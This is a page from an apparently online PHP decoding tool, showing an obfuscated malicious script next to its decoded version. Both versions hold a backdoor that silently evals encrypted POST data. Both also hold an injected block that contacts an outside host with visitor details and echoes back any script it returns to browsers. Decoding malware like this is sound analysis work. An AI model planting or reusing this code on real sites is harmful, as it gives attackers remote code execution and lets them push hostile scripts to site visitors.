Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php @error_reporting(0);@ini_set("di\x73\x70\x6c\x61y_\x65\x72r\x6f\x72\x73",0);@ini_set..
Decoded Output download
<?php @error_reporting(0);@ini_set("display_errors",0);@ini_set("log_errors",0);@ini_set("error_log",0);@ini_set("memory_limit","2M");@ini_set("max_execution_time",30);@set_time_limit(30);if(isset($_SERVER["HTTP_X_REAL_IP"]))$_SERVER["REMOTE_ADDR"]=$_SERVER["HTTP_X_REAL_IP"];if(isset($_POST["code"])){eval(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,"8S7mZiyG",base64_decode($_POST["code"]),MCRYPT_MODE_ECB));}exit;?>
<?php
#e419bf#
error_reporting(0); @ini_set('display_errors',0); $wp_nynln79 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_nynln79) && !preg_match ('/bot/i', $wp_nynln79))){
$wp_nynln0979="http://"."html"."string".".com/"."string"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_nynln79);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_nynln0979); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_79nynln = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_79nynln = @file_get_contents($wp_nynln0979);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_79nynln=@stream_get_contents(@fopen($wp_nynln0979, "r"));}}
if (substr($wp_79nynln,1,3) === 'scr'){ echo $wp_79nynln; }
#/e419bf#
?>
Did this file decode correctly?
Original Code
<?php @error_reporting(0);@ini_set("di\x73\x70\x6c\x61y_\x65\x72r\x6f\x72\x73",0);@ini_set("\x6co\x67\x5ferro\x72\x73",0);@ini_set("\x65r\x72or\x5flo\x67",0);@ini_set("\x6d\x65\x6do\x72y_\x6ci\x6d\x69t","2\x4d");@ini_set("m\x61\x78\x5f\x65\x78\x65cu\x74i\x6fn_t\x69\x6d\x65",30);@set_time_limit(30);if(isset($_SERVER["HT\x54P\x5fX\x5f\x52\x45AL\x5f\x49P"]))$_SERVER["R\x45\x4d\x4fT\x45_A\x44\x44\x52"]=$_SERVER["HT\x54P\x5fX\x5f\x52\x45AL\x5f\x49P"];if(isset($_POST["c\x6fde"])){eval(mcrypt_decrypt(MCRYPT_RIJNDAEL_256,"8\x537m\x5a\x69y\x47",base64_decode($_POST["c\x6fde"]),MCRYPT_MODE_ECB));}exit;?>
<?php
#e419bf#
error_reporting(0); @ini_set('display_errors',0); $wp_nynln79 = @$_SERVER['HTTP_USER_AGENT']; if (( preg_match ('/Gecko|MSIE/i', $wp_nynln79) && !preg_match ('/bot/i', $wp_nynln79))){
$wp_nynln0979="http://"."html"."string".".com/"."string"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_nynln79);
if (function_exists('curl_init') && function_exists('curl_exec')) {$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_nynln0979); curl_setopt ($ch, CURLOPT_TIMEOUT, 20); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_79nynln = curl_exec ($ch); curl_close($ch);} elseif (function_exists('file_get_contents') && @ini_get('allow_url_fopen')) {$wp_79nynln = @file_get_contents($wp_nynln0979);}
elseif (function_exists('fopen') && function_exists('stream_get_contents')) {$wp_79nynln=@stream_get_contents(@fopen($wp_nynln0979, "r"));}}
if (substr($wp_79nynln,1,3) === 'scr'){ echo $wp_79nynln; }
#/e419bf#
?>
Function Calls
substr | 1 |
ini_set | 6 |
preg_match | 2 |
set_time_limit | 1 |
error_reporting | 2 |
Stats
MD5 | 86544276b8a1467f5542a3e36a772596 |
Eval Count | 0 |
Decode Time | 98 ms |